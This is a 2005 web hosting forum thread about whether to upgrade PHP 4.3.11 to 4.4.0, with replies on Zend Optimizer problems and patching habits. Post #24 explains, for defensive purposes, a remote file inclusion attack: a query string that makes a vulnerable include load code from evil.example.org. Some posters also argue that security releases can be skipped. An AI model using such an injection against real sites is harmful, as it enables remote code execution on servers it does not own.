Page 1 of 2 12 LastLast
Results 1 to 25 of 31
  1. #1
    Join Date
    Jul 2002
    Posts
    3,374

    Question php4.3.11 is very old?

    got a question from user that he have been told that php version on my server is very old... uh...php 4.4.0 just come out and from the feedback, it's not worth to upgrade to php 4.4.0 and most web apps doesn't support php5.

    why do people want latest that is not stable or widely supported.

  2. #2
    Join Date
    Oct 2003
    Location
    Israel
    Posts
    133
    PHP 4.4.0 is pretty much like 4.3.11, it's simple a small security release. I would advise you to upgrade.

    - Tomer
    Christmas time is among us, get your loved ones Designer Fragrances

  3. #3
    I'd have to agree, I had some exploits discovered with older versions that caused me some problems.

    Regards,
    Aaron

  4. #4
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by Tomer
    PHP 4.4.0 is pretty much like 4.3.11, it's simple a small security release. I would advise you to upgrade.

    - Tomer
    what kind of security risk? does it really make a difference?

  5. #5
    Join Date
    Jan 2005
    Location
    Minneapolis, MN
    Posts
    966
    Originally posted by jt2377
    what kind of security risk? does it really make a difference?
    http://www.php.net/release_4_4_0.php

    There is also the changelog: http://www.php.net/ChangeLog-4.php#4.4.0
    Doyle Lewis
    BuyHTTP Internet Services - In business since 2003
    Business Hosting | nginx, CloudLinux, Varnish cache, and CDP with every business account
    Shared, Reseller, Semi Dedicated, VPS, Cloud, Dedicated - We can grow with you

  6. #6
    Join Date
    Mar 2004
    Location
    Singapore
    Posts
    6,990
    I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?

  7. #7
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by boonchuan
    I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?
    i also heard the samething. i don't really see that much of risk not upgrading to 4.4.0

  8. #8
    Join Date
    Aug 2003
    Location
    Kansas City, MO
    Posts
    195
    We upgraded one server to PHP 4.4.0 and it caused problems with Zend.
    NameHero® - Fast Web Hosting & Domains Made Easy
    +40,000 web hosting and domain customers
    Awarded Inc. 5000’s fastest growing private companies in America in 2022 and 2023

  9. #9
    Uhh ya I had problems with Zend to but I did over time get it fixed. Anyways its not worth upgrading if you ask me.

  10. #10
    Join Date
    Mar 2005
    Posts
    75
    We upgraded one server to PHP 4.4.0 and it caused problems with Zend.
    Just install new 2.5.10a version of Zend Optimizer, and everything should be fine.

  11. #11
    Join Date
    Jul 2005
    Location
    Chicago
    Posts
    34
    We went from PHP 4.3.10 to PHP 4.3.11 and no more plans to upgrade PHP; will give PHP team more time to update/patch it
    ASBHost.com - We host your business.

    Serious People, Professional Services.
    FortiGate Hardware Firewall, DDoS monitoring, Multilingual Support, E-Commerce ready, cPanel/WHM.

  12. #12
    Join Date
    Jun 2003
    Location
    United States of America
    Posts
    1,847
    all these kinds of upgrades make me sick at somedays especially when you do it on a production server i usually just build a new vserver to see what happens
    Computer Steroids - Full service website development solutions since 2001.
    (612)234-2768 - Locally owned and operated in the Minneapolis, Minnesota area.

  13. #13
    If you upgarde to 4.4.0 make sure you upgarde zend to 2.5.10 and latest version of Ioncube

  14. #14
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Upgraded to PHP 4.4.0 a week ago together with Zend optimizer 2.5.10a and have yet to see any probs with any of the websites on the server.

  15. #15
    Join Date
    Mar 2003
    Location
    Spokane, WA
    Posts
    262
    Perhaps your customer is thinking that PHP 5 has been fully released. I've met a couple of people under that impression.

  16. #16
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).

  17. #17
    Join Date
    Mar 2003
    Location
    Spokane, WA
    Posts
    262
    Excuse me, my bad. PHP 5.1 is what is in beta. Don't mind me, nothing to see here.

  18. #18
    Join Date
    Jan 2004
    Location
    Singapore
    Posts
    1,032
    Unless there is a serious exploit, there is little reason to do so. Because exploits are always there even with the new versions, just that the developers are not aware of it yet.

    My own upgrading process was at 4.3.4 then to 4.3.8 but when there was a serious problem with it, I moved to 4.3.10 and 4.3.11

    Some people just want the provider to spend extra resources to suit their little pecky needs of seeing the newest version number on their screens with little to no knowledge of what goes on at all....

    My 2 Cents.

    "If its not broken why fix it?"
    -=- GQ Hong -=-
    GalacNet WebMaster

  19. #19
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    Since php.net says for every such security/bugfix release that everyone should update ASAP, it doesn't sound to me like a "customer's whim". For me it's rather the opposite, IMO my customers have every right to accept me to keep crucial system components up to date. Some of the big exploits in scripts like phpBB were PHP version dependent, i.e. when one had the latest PHP version at the point of the exploit, the server was safe from it.

    At any rate, on Windows I'm also for the "if it ain't broken, don't fix it" strategy because it's really true, just had to restore a Windows 2003 Server last week because one of the latest small security patches from Windows Update broke just about everything, the computer wasn't working right any more. OTOH on GNU/Linux this is rather unlikely to happen, with commercial addons like cPanel/WHM it happens now and then, but with the core system it's a very rare thing. Years ago when I was mainly using Windows I never patched anything that worked, but after years of having administered GNU/Linux webservers and using Mac OS X at home, I got into the habit of always keeping things on the latest.

  20. #20
    Join Date
    Jul 2002
    Posts
    3,374
    Originally posted by RambOrc
    Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
    if it ain't broken....you know the old saying and like someone already say 4.3.11 is not that much different from 4.4.0. the security risk is rather very small. software bugs is alway there, it's only the matter of seroiusly bad or minor bad.

    in this case 4.4.0 only fix some minor bugs that won't pose much of the threat to the server.
    Last edited by jt2377; 07-28-2005 at 07:40 AM.

  21. #21
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    The "it ain't broken" proverb means to me rather that even though Fedora Core 4 is out, I leave a Fedora Core 2 server the way it is, updating it neither to C3 nor to C4. But for me it doesn't mean leaving things unpatched within C2. Same with PHP, 4.4.0 "addresses a serious memory corruption problem" and that's not to be taken lightly IMO.

  22. #22
    Join Date
    Jan 2005
    Posts
    46
    I understand that for a web hosting company security is always a really important point but sometimes certain upgrades are not really worth.

    IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.

  23. #23
    Join Date
    Jul 2005
    Location
    Chicago
    Posts
    34
    Originally posted by hardwarefanatic


    IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.
    What kind of directives are we talking here about? Share with us so that everbody knows.
    ASBHost.com - We host your business.

    Serious People, Professional Services.
    FortiGate Hardware Firewall, DDoS monitoring, Multilingual Support, E-Commerce ready, cPanel/WHM.

  24. #24
    Join Date
    Jan 2005
    Posts
    46
    Originally posted by asbhost
    What kind of directives are we talking here about? Share with us so that everbody knows.
    What i mean is nothing new. You should always disable certain functions you feel they are not safe or you won't need.

    Just to give you an example:
    Imagine you have this script on your site

    <?php

    include "$path/script.php";

    ?>

    With register_globals enabled , this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:

    <?php

    include 'http://evil.example.org/?/script.php';

    ?>

    If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is has been used many times.

    This is just a basic example of what you need to modify bearing in mind the vulnerabilities discovered. If you get a way of doing this you shouldn't bother to upgrade. Most of the times there's another way round.

  25. #25
    Join Date
    Aug 2004
    Location
    Zurich, Switzerland
    Posts
    774
    In the above example, if register_globals is off, does it matter whether allow_url_fopen is on or off?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •